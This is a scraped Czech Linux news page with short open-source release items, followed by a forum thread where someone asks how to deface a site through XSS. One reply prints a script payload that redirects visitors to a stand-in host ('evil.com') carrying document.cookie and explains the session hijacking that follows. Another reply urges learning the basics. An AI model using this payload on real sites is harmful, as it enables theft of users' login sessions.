Po více než roce vývoje od vydání verze 5.40 byla vydána nová stabilní verze 5.42 programovacího jazyka Perl (Wikipedie). Do vývoje se zapojilo 64 vývojářů. Změněno bylo přibližně 280 tisíc řádků v 1 500 souborech. Přehled novinek a změn v podrobném seznamu.
Byla vydána nová stabilní verze 7.5 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 138. Přehled novinek i s náhledy v příspěvku na blogu.
Sniffnet je multiplatformní aplikace pro sledování internetového provozu. Ke stažení pro Windows, macOS i Linux. Jedná se o open source software. Zdrojové kódy v programovacím jazyce Rust jsou k dispozici na GitHubu. Vývoj je finančně podporován NLnet Foundation.
Byl vydán Debian Installer Trixie RC 2, tj. druhá RC verze instalátoru Debianu 13 s kódovým názvem Trixie.
Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za červen (YouTube).
Libreboot (Wikipedie) – svobodný firmware nahrazující proprietární BIOSy, distribuce Corebootu s pravidly pro proprietární bloby – byl vydán ve verzi 25.06 "Luminous Lemon". Přidána byla podpora desek Acer Q45T-AM a Dell Precision T1700 SFF a MT. Současně byl ve verzi 25.06 "Onerous Olive" vydán také Canoeboot, tj. fork Librebootu s ještě přísnějšími pravidly.
Licence GNU GPLv3 o víkendu oslavila 18 let. Oficiálně vyšla 29. června 2007. Při té příležitosti Richard E. Fontana a Bradley M. Kuhn restartovali, oživili a znovu spustili projekt Copyleft-Next s cílem prodiskutovat a navrhnout novou licenci.
Svobodný nemocniční informační systém GNU Health Hospital Information System (HIS) (Wikipedie) byl vydán ve verzi 5.0 (Mastodon).
Open source mapová a navigační aplikace OsmAnd (OpenStreetMap Automated Navigation Directions, Wikipedie, GitHub) oslavila 15 let.
Vývojář Spytihněv, autor počítačové hry Hrot (Wikipedie, ProtonDB), pracuje na nové hře Brno Transit. Jedná se o příběhový psychologický horor o strojvedoucím v zácviku, uvězněném v nejzatuchlejším metru východně od všeho, na čem záleží. Vydání je plánováno na čtvrté čtvrtletí letošního roku.
Tiskni
Sdílej:
Můžu pomocí javascriptu zobrazit index.php?Javascript běží u klienta - v prohlížeči. Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.
<script> location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; </script>Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad. ..ale je to lamarna .) BTW jde to i na abclinuxu
Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.